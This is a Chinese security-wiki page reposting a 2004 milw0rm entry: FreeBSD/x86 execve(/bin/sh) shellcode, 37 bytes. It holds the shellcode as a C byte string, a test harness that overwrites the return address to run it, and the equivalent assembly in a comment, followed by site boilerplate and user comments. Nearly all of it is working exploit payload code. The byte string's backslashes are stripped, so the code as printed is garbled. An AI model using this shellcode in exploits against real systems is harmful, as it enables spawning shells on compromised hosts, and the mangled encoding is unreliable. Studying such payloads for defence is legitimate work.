FreeBSD/x86 – execve(/bin/sh) Shellcode (37 bytes)
| 漏洞ID | 1054676 | 漏洞类型 | |
| 发布时间 | 2004-09-26 | 更新时间 | 2004-09-26 |
![图片[1]-FreeBSD/x86 – execve(/bin/sh) Shellcode (37 bytes)-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png) CVE编号
|
N/A |
![图片[2]-FreeBSD/x86 – execve(/bin/sh) Shellcode (37 bytes)-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png) CNNVD-ID
|
N/A |
| 漏洞平台 | FreeBSD_x86 | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/* This is FreeBSD execve() code.It is 37 bytes long.I'll try to make it *
* smaller.Till then use this one. *
* signed predator *
* preedator(at)sendmail(dot)ru *
*************************************************************************/
char FreeBSD_code[]=
"xebx17x5bx31xc0x88x43x07x89x5bx08x89x43x0cx50x8d"
"x53x08x52x53xb0x3bx50xcdx80xe8xe4xffxffxff/bin/sh";
int main(){
int *ret=(int *)(&ret+2);
printf("len : %dn",strlen(FreeBSD_code));
*ret=(int)FreeBSD_code;
}
/*****************************************
*int main(){ *
* __asm__("jmp callme n" *
* "jmpme: n" *
* "pop %ebx n" *
* "xorl %eax,%eax n" *
* "movb %al,0x7(%ebx) n" *
* "movl %ebx,0x8(%ebx) n" *
* "movl %eax,0xc(%ebx) n" *
* "push %eax n" *
* "leal 0x8(%ebx),%edx n" *
* "push %edx n" *
* "push %ebx n" *
* "movb $0x3b,%al n" *
* "push %eax n" *
* "int $0x80 n" *
* "callme: n" *
* "call jmpme n" *
* ".string "/bin/sh" n"); *
*} *
*****************************************/
// milw0rm.com [2004-09-26]相关推荐: Lucent Brick Spoofed Address Communication Denial Of Service Vulnerability
Lucent Brick Spoofed Address Communication Denial Of Service Vulnerability 漏洞ID 1101738 漏洞类型 Design Error 发布时间 2002-07-27 更新时间 200…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666